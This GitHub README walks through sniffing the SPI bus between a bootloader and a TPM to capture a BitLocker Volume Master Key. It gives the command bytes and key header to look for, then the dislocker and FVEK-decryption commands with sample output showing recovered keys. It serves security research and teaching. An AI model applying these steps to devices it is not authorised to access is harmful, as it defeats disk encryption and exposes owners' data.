giggi0x00/Bitlocker-SPI-TPM-Key-sniffing
TPM key sniffing. The bootloader and the TPM communicate over one of several bus protocols, such as LPC, SPI or I2C. Let's see how it works when the communication takes place over the SPI protocol.

This project was inspired by https://pulsesecurity.co.nz/articles/TPM-sniffing. Thanks!

The SPI protocol is based on 4 signals: SPI CLK, SPI MISO, SPI MOSI and SPI CS. Data goes in and out over MOSI and MISO, and the slave is selected by pulling the SPI CS signal low.

```
SPI CS   <--------> SPI CS
SPI MOSI ---------> SPI MOSI
SPI MISO <--------- SPI MISO
SPI CLK  <--------> SPI CLK
```

So the communication between the bootloader and the TPM uses 4 lines. What we have to do is just sniff the traffic that takes place on these data lines.

First of all, we have to identify the TPM installed on the main board, in my case:


Pretty small. :)

And so even if you don't know the specific TPM in front of you, just remember that the pinout is standardised: https://trustedcomputinggroup.org/wp-content/uploads/PC-Client-Specific-Platform-TPM-Profile-for-TPM-2p0-vp04p34_pubrev.pdf

Then solder some wires to the relevant pins and start sniffing with a logic analyzer, using a sample rate of at least 4 times the SPI clock frequency in order to reconstruct the original signal.


The command used by the bootloader to read back the VMK is "80h" from the address "0024h" (TPM_DATA_FIFO_0). What we need to do to get the key is to look for this specific command and address.
Start from the VMK header "2C 00 00 00 01 00 00 00 03 20 00 00" and write down the following 32 bytes.

Read 32 bytes and you will get the key.
Now you are ready to decrypt the hard disk.
Mount it and run:

```
sudo dislocker-metadata -V /dev/sda2 > dislocker-metadata.txt
```

Then decrypt the FVEK with `bitlocker_fvek_decrypt.py` from SySS Research's icestick-lpc-tpm-sniffer project (https://github.com/SySS-Research/icestick-lpc-tpm-sniffer/blob/master/README.md), where `vmk.bin` is the key extracted from the bus:

```
$ python bitlocker_fvek_decrypt.py -f dislocker-metadata.txt -k vmk.bin
BitLocker FVEK Decrypt v0.2 by Matthias Deeg - SySS GmbH

Decrypts encrypted BitLocker Full Volume Encryption Keys (FVEK)

[+] Extracted nonce:
409b87a369dbd501d9010000
[+] Extracted MAC:
12c7b1c759e76ad88c3efd451a0fc945
[+] Extracted payload:
fd82fcf27ded951a2327e2e9d00b9ba0a3245f949bc53163bcc26088531215d17be6f99794d3fcfeb22bb41e
[+] Decrypted Full Volume Encryption Key (FVEK):
561bd26ca61fa3fb3445994b0f62649ce86e90085c0ff25dda57be61c2667cb6
[+] Created FVEK file 'fvek.bin' for use with dislocker
```


Now you can decrypt the full hard disk with the FVEK.